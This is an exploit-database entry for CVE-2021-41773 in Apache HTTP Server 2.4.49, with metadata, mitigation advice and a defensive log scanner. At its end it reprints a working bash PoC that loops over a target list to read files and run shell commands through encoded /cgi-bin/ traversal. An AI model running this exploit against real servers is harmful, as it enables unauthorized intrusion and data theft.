Vendor: Apache HTTP Server
By: Lucas Souza
CVSS: 7.5 HIGH
Path Traversal & Remote Code Execution
CWE: 22
Product Name: Apache HTTP Server
Affected Version From: 2.4.49
Affected Version To: 2.4.49
Patch Exists: NO
Related CWE: CVE-2021-41773
CPE: apache_http_server:2.4.49
Other Scripts:
Tags: cve,cve2021,lfi,rce,apache,misconfig,traversal,kev
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Nuclei Metadata: {'max-request': 3, 'shodan-query': 'Apache 2.4.49', 'verified': True, 'vendor': 'apache', 'product': 'http_server'}
Platforms Tested:
2021

Apache HTTP Server 2.4.49 – Path Traversal & Remote Code Execution (RCE)

This exploit performs path traversal and remote code execution against Apache HTTP Server version 2.4.49. By manipulating the request path (the PoC below uses percent-encoded dot segments such as .%2e/ and %2e%2e/ under /cgi-bin/), an attacker can access sensitive files on the server and execute arbitrary commands. The vulnerability is identified by CVE-2021-41773.

Mitigation:

Apply the patch provided by the vendor or upgrade to a non-affected version. Additionally, restrict access to sensitive directories and files.
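
A log check for the traversal pattern described above, as an added example that is not part of the original entry or the Exploit-DB script: it percent-decodes each logged request path and reports entries whose dot segments climb above the URL root. The log lines, addresses and function names are constructed for illustration and assume Apache's default access-log layout.

```python
import re
from urllib.parse import unquote

# Request line as logged by Apache: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample entries (documentation-range addresses), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [05/Oct/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 1024',
    '198.51.100.7 - - [05/Oct/2021:10:00:02 +0000] "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 200 1811',
    '198.51.100.7 - - [05/Oct/2021:10:00:03 +0000] "POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1" 200 12',
    '192.0.2.44 - - [05/Oct/2021:10:00:04 +0000] "GET /docs/../index.html HTTP/1.1" 200 1024',
    '203.0.113.5 - - [05/Oct/2021:10:00:05 +0000] "GET /icons/.%2e/%2e%2e/etc/passwd HTTP/1.1" 403 199',
]


def escapes_root(target, max_rounds=3):
    """True if the path, raw or after repeated percent-decoding, climbs above '/'."""
    path = target.split("?", 1)[0]
    for _ in range(max_rounds):
        depth = 0
        for segment in path.split("/"):
            if segment == "..":
                depth -= 1
                if depth < 0:
                    return True
            elif segment not in ("", "."):
                depth += 1
        decoded = unquote(path)
        if decoded == path:  # nothing left to decode
            break
        path = decoded
    return False


def scan(lines):
    """Return (client, method, target, status) for each entry that escapes the root."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if match and escapes_root(match.group("target")):
            rest = line[match.end():].split()
            status = rest[0] if rest else "?"
            hits.append((line.split()[0], match.group("method"),
                         match.group("target"), status))
    return hits


if __name__ == "__main__":
    for client, method, target, status in scan(SAMPLE_LOG):
        # Status 200 means the server answered the traversal request.
        print(f"{status} {method:4} {client} {target}")
```

Entries reported with status 200 are the ones to triage first, and a POST among them matches the command-execution form of the request shown in the PoC.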

Exploit-DB raw data:

# Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE)
# Date: 10/05/2021
# Exploit Author: Lucas Souza https://lsass.io
# Vendor Homepage:  https://apache.org/
# Version: 2.4.49
# Tested on: 2.4.49
# CVE : CVE-2021-41773
# Credits: Ash Daulton and the cPanel Security Team

#!/bin/bash

if [[ $1 == '' ]] || [[ $2 == '' ]]; then
echo "Set [TARGET-LIST.TXT] [PATH] [COMMAND]"
echo ./PoC.sh targets.txt /etc/passwd
exit
fi
for host in $(cat $1); do
echo $host
curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done

# PoC.sh targets.txt /etc/passwd
# PoC.sh targets.txt /bin/sh whoami